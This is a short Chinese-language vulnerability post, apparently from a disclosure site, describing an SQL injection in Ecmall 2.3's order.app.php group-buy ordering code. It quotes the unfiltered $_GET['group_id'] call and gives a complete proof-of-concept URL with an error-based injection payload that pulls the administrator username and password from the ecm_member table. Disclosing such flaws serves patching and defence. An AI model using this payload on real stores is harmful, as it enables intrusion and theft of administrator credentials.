Ecmall 2.3版本存SQL注入漏洞

漏洞出现在order.app.php文件团购后下订单时 没有对 $_GET['group_id']进行过滤
[php]
function _clear_goods($order_id)

{

switch ($_GET['goods'])

{

case 'groupbuy':

/* 团购的商品 */

$model_groupbuy =& m('groupbuy');

$model_groupbuy->updateRelation('be_join', $_GET['group_id'], $this->visitor->get('user_id'), array(

'order_id' => $order_id,

));//这里没有对$_GET['group_id']进行过滤

break;

}

}
[/php]
漏洞证明:
首先参加一个团购活动,当团购活动结束后,点击购买
ecmall1

点下一步时,更改当前网址如:
[php]http://0day5.com/index.php?app=order&goods=groupbuy&group_id=2 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23[/php]

ecmall2
然后点击"下单完成并支付"将会出现注入信息,如管理员账号密码等
ecmall3

发表评论